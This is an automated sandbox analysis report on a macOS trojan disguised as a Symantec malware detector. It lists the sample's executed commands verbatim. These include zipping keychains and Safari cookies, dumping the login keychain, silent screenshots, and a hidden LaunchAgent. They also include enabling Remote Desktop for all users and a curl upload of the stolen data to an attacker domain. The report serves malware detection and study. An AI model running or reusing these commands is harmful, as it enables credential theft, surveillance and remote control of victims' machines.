Joe Sandbox Cloud Pro Analysis Report

Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:21.0.0
Analysis ID:46001
Start time:13:08:42
Joe Sandbox Product:Cloud
Start date:21.11.2017
Overall analysis duration:0h 14m 7s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:BiyuYDBAMc (renamed file extension from none to app)
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Mac Mini, El Capitan 10.11.6 (MS Office 15.25, Java 1.8.0_131)
Detection:MAL
Classification:mal100.troj.spyw.expl.evad.macAPP@0/50@15/0
Warnings:
Show All
  • Report creation exceeded maximum number of non-whitelisted processes and may have missing process information.


Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious


Classification

Signature Overview

Click to jump to signature section


Cryptography:

barindex
Creates files with functionality related to DES encryption and/or decryptionShow sources
Source: /private/tmp/xpc.app/Contents/Resources/pyDes.pyFound S1 S-Box: [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7, 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8, 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0, 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13]
Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.pyFound S1 S-Box: [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7, 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8, 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0, 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13]
Executes the "openssl" command used for crypographic operationsShow sources
Source: /bin/sh (PID: 507)Openssl executable: /usr/bin/openssl -> openssl rsautl -verify -in /tmp/xpc.app/Contents/Resources/.checksum -pubin -inkey /tmp/public.pem
Writes files containing public keys to diskShow sources
Source: /usr/bin/unzip (PID: 502)File created 'PUBLIC KEY' pattern: /private/tmp/xpc.app/Contents/MacOS/xpc
Source: /bin/sh (PID: 506)File created 'PUBLIC KEY' pattern: /private/tmp/public.pem
Source: /bin/cp (PID: 541)File created 'PUBLIC KEY' pattern: /Library/.random/xpcd.app/Contents/MacOS/xpc

Networking:

barindex
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: script.google.com
Reads from file descriptors related to (network) socketsShow sources
Source: /sbin/route (PID: 479)Reads from socket in process: data
Source: /usr/bin/curl (PID: 513)Reads from socket in process: data
Source: /usr/bin/curl (PID: 516)Reads from socket in process: data
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49203
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49202
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49201
Source: unknownNetwork traffic detected: HTTP traffic on port 49202 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49201 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49203 -> 443
Writes from file descriptors related to (network) socketsShow sources
Source: /sbin/route (PID: 479)Writes from socket in process: data
Source: /usr/bin/curl (PID: 513)Writes from socket in process: data
Source: /usr/bin/curl (PID: 516)Writes from socket in process: data
May scan ports using the "nc" (netcat) commandShow sources
Source: /bin/sh (PID: 510)Netcat executable (-z switch): /usr/bin/nc -> nc -G 20 -z 8.8.8.8 53
Detected non-DNS traffic on DNS portShow sources
Source: global trafficTCP traffic: 192.168.0.50:49200 -> 8.8.8.8:53
Executes the "nc" (netcat) command used to establish arbitrary TCP or UDP connections and listensShow sources
Source: /bin/sh (PID: 510)Netcat executable: /usr/bin/nc -> nc -G 20 -z 8.8.8.8 53
Pings several hosts (probably to check C&C connectivity)Show sources
Source: Ping host argumentsMore than 5 different servers pinged: abrahamlincolnisaliveandrunssymantec.com, symeher.co, symantecheurengine.com, kio2349329490jfdkf394.com, symheureng.com, klsadkla93242lokiloki.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Captures screenshots with shell command 'screencapture'Show sources
Source: /bin/sh (PID: 493)Screen captured: screencapture -x /tmp/.dio3we/.prelim.png -> screencapture -x /tmp/.dio3we/.prelim.png
Enables system access through Apple's Remote Desktop Sharing for all usersShow sources
Source: /usr/bin/sudo (PID: 551)Apple Remote Desktop kickstart all users: /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -> /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers
Explicitly creates screenshots silently (i.e. without playing sounds)Show sources
Source: /bin/sh (PID: 493)Screencapture executable (-x switch): screencapture -x /tmp/.dio3we/.prelim.png -> screencapture -x /tmp/.dio3we/.prelim.png
Uses kickstart to modify Apple's Remote Desktop settingsShow sources
Source: /usr/bin/sudo (PID: 551)Apple Remote Desktop kickstart: /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -> /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers

System Summary:

barindex
Classification labelShow sources
Source: classification engineClassification label: mal100.troj.spyw.expl.evad.macAPP@0/50@15/0

Data Obfuscation:

barindex
Imports the IOKit library (often used to register services)Show sources
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
Imports the Security library (often used for certificate, key, keychain, or secure transport handling)Show sources
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security

Persistence and Installation Behavior:

barindex
App bundle is code signedShow sources
Source: Submitted file: BiyuYDBAMc.appCodeResources XML file: CodeResources
Source: Submitted file: BiyuYDBAMc.appCodeResources XML file: CodeResources
Creates application bundles containing icon filesShow sources
Source: /usr/bin/unzip (PID: 502)Icon file created: /tmp/xpc.app/Contents/Resources/Finder.icns
Source: /bin/cp (PID: 541)Icon file created: /Library/.random/xpcd.app/Contents/Resources/Finder.icns
Executes the "awk" command used to scan for patterns (usually in standard output)Show sources
Source: /bin/sh (PID: 480)Awk executable: /usr/bin/awk -> awk /gateway/ { print $2 }
Reads data from the local random generatorShow sources
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Random device file read: /dev/random
Source: /usr/bin/zip (PID: 485)Random device file read: /dev/random
Source: /usr/bin/zip (PID: 487)Random device file read: /dev/random
Source: /usr/sbin/screencapture (PID: 493)Random device file read: /dev/random
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Random device file read: /dev/random
Source: /usr/bin/openssl (PID: 507)Random device file read: /dev/urandom
Source: /usr/bin/curl (PID: 513)Random device file read: /dev/random
Source: /usr/bin/curl (PID: 513)Random device file read: /dev/random
Source: /usr/bin/curl (PID: 516)Random device file read: /dev/random
Source: /usr/bin/curl (PID: 516)Random device file read: /dev/random
Source: /usr/bin/perl5.18 (PID: 551)Random device file read: /dev/urandom
Uses AppleKeyboardLayouts bundle containing keyboard layoutsShow sources
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Uses the Python frameworkShow sources
Source: /usr/bin/xattr (PID: 503)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Writes property list (.plist) files to diskShow sources
Source: /usr/bin/unzip (PID: 502)XML plist file created: /private/tmp/xpc.app/Contents/Info.plist
Source: /usr/bin/unzip (PID: 502)Binary plist file created: /private/tmp/xpc.app/Contents/Resources/MainMenu.nib
Source: /bin/cp (PID: 541)XML plist file created: /Library/.random/xpcd.app/Contents/Info.plist
Source: /bin/cp (PID: 541)Binary plist file created: /Library/.random/xpcd.app/Contents/Resources/MainMenu.nib
Source: /bin/sh (PID: 544)XML plist file created: /Library/.random/xpcd.app/Contents/Info.plist
Source: /bin/sh (PID: 546)XML plist file created: /Library/LaunchAgents/com.apple.xpcd.plist
Changes permissions of written Mach-O filesShow sources
Source: /usr/bin/unzip (PID: 502)Permissions modifiied for written 64-bit Mach-O /private/tmp/xpc.app/Contents/MacOS/xpc: bits: - usr: rx grp: rx all: rwx
Source: /bin/cp (PID: 541)Permissions modifiied for written 64-bit Mach-O /Library/.random/xpcd.app/Contents/MacOS/xpc: bits: - usr: rx grp: rx all: rwx
Checks the current date and time via Internet using a shell commandShow sources
Source: /bin/sh (PID: 513)HTTP request via command: /usr/bin/curl -> curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec
Creates Python files with suspicious function namesShow sources
Source: /private/tmp/xpc.app/Contents/Resources/pbkdf2.pySuspicious function name: def xorstr(a, b):
Source: /private/tmp/xpc.app/Contents/Resources/pyDes.pySuspicious function name: def encrypt(self, data, pad=''):
Source: /private/tmp/xpc.app/Contents/Resources/pyDes.pySuspicious function name: def decrypt(self, data, pad=''):
Source: /private/tmp/xpc.app/Contents/Resources/pyDes.pySuspicious function name: def xorstr(self, x, y):
Source: /private/tmp/xpc.app/Contents/Resources/pyDes.pySuspicious function name: def encrypt(self, data, pad=''):
Source: /private/tmp/xpc.app/Contents/Resources/pyDes.pySuspicious function name: def decrypt(self, data, pad=''):
Source: /Library/.random/xpcd.app/Contents/Resources/pbkdf2.pySuspicious function name: def xorstr(a, b):
Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.pySuspicious function name: def encrypt(self, data, pad=''):
Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.pySuspicious function name: def decrypt(self, data, pad=''):
Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.pySuspicious function name: def xorstr(self, x, y):
Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.pySuspicious function name: def encrypt(self, data, pad=''):
Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.pySuspicious function name: def decrypt(self, data, pad=''):
Creates application bundlesShow sources
Source: /usr/bin/unzip (PID: 502)Bundle Info.plist file created: /tmp/xpc.app/Contents/Info.plist
Source: /bin/cp (PID: 541)Bundle Info.plist file created: /Library/.random/xpcd.app/Contents/Info.plist
Creates hidden files, links and/or directoriesShow sources
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Hidden file created: /tmp/.dio3we/.dat.nosync01dc.lbqoPC
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Hidden file moved: /tmp/.dio3we/.dat.nosync01dc.lbqoPC -> /tmp/.dio3we/.lmx
Source: /bin/mkdir (PID: 481)Hidden Directory created: /tmp/.dio3we -> /tmp/.dio3we
Source: /usr/sbin/screencapture (PID: 493)Hidden file created: /tmp/.dio3we/..prelim.png-GB5W
Source: /usr/sbin/screencapture (PID: 493)Hidden file moved: /tmp/.dio3we/..prelim.png-GB5W -> /tmp/.dio3we/.prelim.png
Source: /bin/sh (PID: 500)Hidden file created: /tmp/.sklerfde
Source: /usr/bin/unzip (PID: 502)Hidden file created: /tmp/xpc.app/Contents/Resources/.checksum
Source: /usr/bin/unzip (PID: 502)Hidden file created: /tmp/xpc.app/Contents/Resources/.crc32
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Hidden file created: /Library/.cachedir/.dat.nosync01f9.oWo2Oy
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Hidden file moved: /Library/.cachedir/.dat.nosync01f9.oWo2Oy -> /Library/.cachedir/.lmx
Source: /bin/mkdir (PID: 538)Hidden Directory created: /Library/.cachedir -> /Library/.cachedir
Source: /bin/mkdir (PID: 538)Hidden Directory created: /Library/.random -> /Library/.random
Source: /bin/cp (PID: 541)Hidden file created: /Library/.random/xpcd.app/Contents/Resources/.checksum
Source: /bin/cp (PID: 541)Hidden file created: /Library/.random/xpcd.app/Contents/Resources/.crc32
Executes commands using a shell command-line interpreterShow sources
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c route -n get default | awk '/gateway/ { print $2 }'
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c mkdir /tmp/.dio3we
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c cp /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/History.db.dump
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c rm -rf /Users/vreni/Library/Safari/History.db.dump
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c zip -qr /tmp/.dio3we/SAFARI.zip ~/Library/Cookies ~/Library/Safari/History.db ~/Library/Safari/Bookmarks.plist ~/Library/Safari/Form\ Values && echo success
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c zip -qr /tmp/.dio3we/KEYCHAINS.zip ~/Library/Keychains /Library/Keychains && echo success
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c zip -qr /tmp/.dio3we/backup_(null).zip /tmp/.dio3we && echo success
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c find /tmp/.dio3we -type f -not -name 'backup_(null).zip' -print0 | xargs -0 rm --
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c screencapture -x /tmp/.dio3we/.prelim.png
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c csrutil status
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c sudo -k
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c echo '' | sudo -S echo success
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c echo 'vreni<0delim0>' > /tmp/.sklerfde
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c unzip -d /tmp /Users/vreni/Desktop/unpack/Symantec\ Malware\ Detector.app/Contents/Resources/sym03_2901.dat && xattr -c /tmp/xpc.app open /tmp/xpc.app
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c echo '-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvceoh2bLtCGhgMM6SHvse8qFPKI4yX/RLAfKSvccClFnV7WQqlqVEZ/xL9/wQ6uSbwEUxwweq9lu8CMSucKR881zSFHBoj2epoHFbJoJmI3Cn8GHLZs+JbDss/kxrtNDTBYXAC6jL0xwPj4zj2LdvuSLvkh25egGmc/M3IXEjBtjSBvjEjWF5/QD0oDfKXs/j6OvurrjSReqxwZFKcOc5RH2hTRj2wu/Kuz7yVFeRrpCusjuVteq8ePFT7UF7QnXgfGvsxMsv3cItmoEJYkz1xcVyfknIlIaqsJrDT0zjn61Vsj9ywB8WeK2g9BSublBZ7PN5jHXdZWudgtrExHvUwIDAQAB-----END PUBLIC KEY-----' > /tmp/public.pem openssl rsautl -verify -in /tmp/xpc.app/Contents/Resources/.checksum -pubin -inkey /tmp/public.pem
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c nc -G 20 -z 8.8.8.8 53 >/dev/null 2>&1 && echo success
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c hcresult=`curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec` && echo $hcresult
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c a90=`curl -s --connect-timeout 10 -o /tmp/au https://symantecheurengine.com/rsa` && echo && echo '-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAs7a+wrCidA8Z50sv1ExI0FQFqWATGGNKhY2X4TrHEcp0VrTpNbaL8uYo05LiHpowtPZ4Ej0kTtUbGMt7weQ6dVgtALtkcpMfZqC4ii89sb/PX0tIWnJkj2fPpDbMvj4m6dCim7VSO7rXJm81EO6I+cYXFrDNVdKUNO8doZjP2Fw7y/jJLdowusSb8YAnHNsi2KQ0tlZ0pFQmJWgSQ0QWMtCW1UE6tTK21kxP1u7OP6lKAQsYDO1tWyQw4L/X3YK/3Sy7ZBNE8tCWPKDtd1mxJxwcPJt5bcCjFxhqMXznBGHLdNDJHPq1t0ZBQyrRBUK5VbfcbnoruiMpph6FNaqZ7wIDAQAB-----END PUBLIC KEY-----' > /tmp/au.pub && echo success
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c ping -c 1 symantecheurengine.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c ping -c 1 symheureng.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c ping -c 1 symeher.co 2>/dev/null >/dev/null && echo 0
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c ping -c 1 kio2349329490jfdkf394.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c ping -c 1 klsadkla93242lokiloki.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c ping -c 1 abrahamlincolnisaliveandrunssymantec.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c if [ -f /Library/.cachedir/.ptrun ] then echo success fi
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c cat /tmp/.sklerfde
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c rm -rf /tmp/.sklerfde
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c killall Console killall Wireshark rm -rf grace_period echo '' | sudo -S mkdir -p /Library/.cachedir /Library/.random && sudo chmod -R 777 /Library/.cachedir /Library/.random && cp -R /tmp/xpc.app /Library/.random/xpcd.app && mv /Library/.random/xpcd.app/Contents/MacOS/xpc /Library/.random/xpcd.app/Contents/MacOS/xpcd && sudo sh -c 'echo '<?xml version=\'1.0\' encoding=\'UTF-8\'?><!DOCTYPE plist PUBLIC \'-//Apple//DTD PLIST 1.0//EN\' \'http://www.apple.com/DTDs/PropertyList-1.0.dtd\'><plist version=\'1.0\'><dict><key>CFBundleDevelopmentRegion</key><string>en</string><key>CFBundleExecutable</key><string>xpcd</string><key>CFBundleIdentifier</key><string>com.apple.xpcd</string><key>CFBundleInfoDictionaryVersion</key><string>2.0</string><key>CFBundleName</key><string>xpcd</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleShortVersionString</key><string>2.0</string><key>CFBundleSignature</key><string>????</string><key>CFBundleSupportedPlatforms</key><array><string>MacOSX</strin
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c csrutil status
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c route -n get default | awk '/gateway/ { print $2 }'
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c python /tmp/xpc.app/Contents/Resources/cb.py -f /Users/vreni/Library/Keychains/login.keychain -p 2>/dev/null > /tmp/.kcd && echo 'success'
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c zip -qr /Library/.cachedir/KEYCHAINS.zip ~/Library/Keychains /Library/Keychains && echo success
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c cp /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/History.db.dump
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c rm -rf /Users/vreni/Library/Safari/History.db.dump
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c zip -qr /Library/.cachedir/SAFARI.zip ~/Library/Cookies ~/Library/Safari/History.db ~/Library/Safari/Bookmarks.plist ~/Library/Safari/Form\ Values && echo success
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c zip -qr /Library/.cachedir/backup_(null).zip /Library/.cachedir && echo success
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c find /Library/.cachedir -type f -not -name 'backup_(null).zip' -print0 | xargs -0 rm --
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c screencapture -x /Library/.cachedir/.prelim.png
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c a1511269823=`curl -s -F full_name='vreni' -F admin='1' -F hostname='vreni%E2%80%99s Mac mini' -F signed='0' -F file='@/Library/.cachedir/backup_(null).zip' -F xml='@/Library/.cachedir/.lmx' -F username='vreni' -F screen='@/Library/.cachedir/.prelim.png' -F ssh_present='0' -F serial-F api_key=57432354a89c4bab15b1c7795507e44d74d21d9500c9d5307a3d71a7949f608b -F cts=1511269823 -F signature=13ba26234ba13dbd86138b9214f0edc304bf9926a7298a58aceeb48bf0270332 https://symantecheurengine.com/api/init` echo $a1511269823
Source: /usr/bin/sudo (PID: 544)Shell command executed: sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>CFBundleDevelopmentRegion</key><string>en</string><key>CFBundleExecutable</key><string>xpcd</string><key>CFBundleIdentifier</key><string>com.apple.xpcd</string><key>CFBundleInfoDictionaryVersion</key><string>2.0</string><key>CFBundleName</key><string>xpcd</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleShortVersionString</key><string>2.0</string><key>CFBundleSignature</key><string>????</string><key>CFBundleSupportedPlatforms</key><array><string>MacOSX</string></array><key>CFBundleVersion</key><string>17</string><key>DTSDKName</key><string>macosx10.12internal</string><key>LSMinimumSystemVersion</key><string>10.7</string><key>LSUIElement</key><true/><key>NSHumanReadableCopyright</key><string>Copyright 2017 wickedinfinity. All rights reserved.</string><key>NSMainNibFile</key><string>MainMenu</string><key>
Source: /usr/bin/sudo (PID: 546)Shell command executed: sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>KeepAlive</key><true/><key>Label</key><string>com.apple.xpcd</string><key>ProgramArguments</key><array><string>/Library/.random/xpcd.app/Contents/MacOS/xpcd</string></array><key>RunAtLoad</key><true/></dict></plist>' > /Library/LaunchAgents/com.apple.xpcd.plist
Source: /usr/bin/perl5.18 (PID: 553)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -list /Local/Target/Users
Source: /usr/bin/perl5.18 (PID: 554)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_amavisd' uid
Source: /usr/bin/perl5.18 (PID: 555)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appleevents' uid
Source: /usr/bin/perl5.18 (PID: 556)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appowner' uid
Source: /usr/bin/perl5.18 (PID: 557)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appserver' uid
Source: /usr/bin/perl5.18 (PID: 558)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ard' uid
Source: /usr/bin/perl5.18 (PID: 559)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_assetcache' uid
Source: /usr/bin/perl5.18 (PID: 560)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_astris' uid
Source: /usr/bin/perl5.18 (PID: 561)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_atsserver' uid
Source: /usr/bin/perl5.18 (PID: 562)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_avbdeviced' uid
Source: /usr/bin/perl5.18 (PID: 563)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_calendar' uid
Source: /usr/bin/perl5.18 (PID: 564)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ces' uid
Source: /usr/bin/perl5.18 (PID: 565)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_clamav' uid
Source: /usr/bin/perl5.18 (PID: 566)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_coreaudiod' uid
Source: /usr/bin/perl5.18 (PID: 567)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_coremediaiod' uid
Source: /usr/bin/perl5.18 (PID: 568)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cvmsroot' uid
Source: /usr/bin/perl5.18 (PID: 569)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cvs' uid
Source: /usr/bin/perl5.18 (PID: 570)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cyrus' uid
Source: /usr/bin/perl5.18 (PID: 571)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_devdocs' uid
Source: /usr/bin/perl5.18 (PID: 572)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_devicemgr' uid
Source: /usr/bin/perl5.18 (PID: 573)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_displaypolicyd' uid
Source: /usr/bin/perl5.18 (PID: 574)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_distnote' uid
Source: /usr/bin/perl5.18 (PID: 575)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_dovecot' uid
Source: /usr/bin/perl5.18 (PID: 576)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_dovenull' uid
Source: /usr/bin/perl5.18 (PID: 577)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_dpaudio' uid
Source: /usr/bin/perl5.18 (PID: 578)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_eppc' uid
Source: /usr/bin/perl5.18 (PID: 579)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ftp' uid
